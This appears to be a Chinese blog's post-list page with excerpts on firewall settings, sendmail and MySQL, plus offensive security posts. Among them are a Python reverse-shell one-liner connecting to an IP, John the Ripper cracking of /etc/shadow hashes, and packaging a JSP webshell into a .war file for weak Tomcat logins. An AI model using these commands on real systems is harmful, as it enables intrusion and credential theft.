- 博客(12)
- 收藏
- 关注
原创 2021-01-06
Windows防火墙下禁止/开启ping命令(精简版)开启Windows防火墙 –> 高级设置 –> 入站规则 –> 在列表里找到“文件和打印机共享(回显请求 – ICMPv4-In)” –> 右击选择启用规则,并在其属性里设置为‘允许连接’–> 确定 。禁用看是有三项,都是启用。分别在三项上右键,选择“禁用规则”...
2021-01-06 11:46:13 130
原创 Tomcat后台弱口令漏洞及war码制作
重点来了:那儿只能上传文件后缀为.war,那么它是什么呢?你可以理解为就是一个包,然后它里面包含一个xx.jsp的木马,那么怎么制作它呢?1.先找到一个jsp的大马,然后放到文本文档里,然后用解压软件解压为rar的文件,再更改一下后缀为war即可。还有一种方式,利用cmd命令行来做,具体参考(http://admin-yuku.lofter.com/post/1cbd1826_4383805)...
2020-04-29 21:51:28 425
原创 ubuntu sendmail配置发送邮件
ubuntu中sendmail函数可以很方便的发送邮件,ubuntu sendmail先要安装两个包。必需安装的两个包:代码sudo apt-get install sendmailsudo apt-get install sendmail-cf下面几个包是可选的:代码squirrelmail //提供webmailspamassassin ...
2020-02-24 15:50:59 390
原创 Ubuntu mail 配置
ubuntu sendmail配置发送邮件ubuntu中sendmail函数可以很方便的发送邮件,ubuntu sendmail先要安装两个包。必需安装的两个包:代码sudo apt-get install sendmailsudo apt-get install sendmail-cf下面几个包是可选的:代码squirrelmail //提供webmai...
2019-10-26 16:38:38 591
原创 John the Ripper 密码破解工具
破解Linux的用户密码:John 【跨平台的密码解密工具】root@only:~# unshadow /etc/passwd /etc/shadow > ~/file_to_crackroot@only:~# john --wordlist=/usr/share/john/password.lst ~/file_to_crackrm -rf /root/.john/john.pot...
2019-09-19 17:03:47 415
原创 用命令创建MySQL数据库
一、连接MYSQL格式: mysql -h主机地址 -u用户名 -p用户密码1、 连接到本机上的MYSQL。首先打开DOS窗口,然后进入目录mysql\bin,再键入命令mysql -u root -p,回车后提示你输密码.注意用户名前可以有空格也可以没有空格,但是密码前必须没有空格,否则让你重新输入密码.如果刚安装好MYSQL,超级用户root是没有密码的,故直接回车即可进入到MYSQL...
2019-08-26 15:37:43 595
原创 ThinkPHP 漏洞检测
0x00 前言由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。0x01 影响范围5.x < 5.1.31, <= 5.0.230x02 漏洞分析Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/com...
2019-08-19 21:05:41 1988
转载 火狐破解收费hackbar
https://blog.csdn.net/qq_38963246/article/details/95489242
2019-07-30 17:07:54 3248
转载 未授权访问漏洞总结
未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。常见的未授权访问漏洞1.MongoDB 未授权访问漏洞2.Redis 未授权访问漏洞3.Memcached 未授权访问漏洞CVE-2013-72394.JBOSS 未授权访问漏洞5.VNC 未授权访问漏洞6.Docker 未授权访问漏...
2019-07-29 19:45:09 6028
转载 不小心执行 rm -f,该如何恢复?
1、删除误删除服务器目录/root/selenium/Spider下的MySql.Data.dll文件:rm -f /root/selenium/Spider/MySql.Data.dllll /root/selenium/Spider/MySql.Data.dllls: cannot access /root/selenium/Spider/MySql.Data.dll: No suc...
2019-07-29 19:42:14 213
原创 python 提权
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“IP”,18080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh"...
2019-07-22 15:50:12 1470
转载 CVE-2019-3396 实战反弹shell
前言距离4月4日Confluence官方发布远程命令执行高危漏洞的安全更新距今已快一周的时间。在网上也陆续爆出了一系列的POC,但是这些POC仅局限于测试是否存在漏洞,或者就是只是命令执行,并不能进行shell的反弹,如果不能反弹shell,那要这洞有何用。于是我花了一下午的时间去进行测试,才有了这篇利用该漏洞进行实战反弹shell的文章。准备鉴于网上已有一系列的分析文章,这里我也不做漏洞...
2019-07-22 15:28:21 2872
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人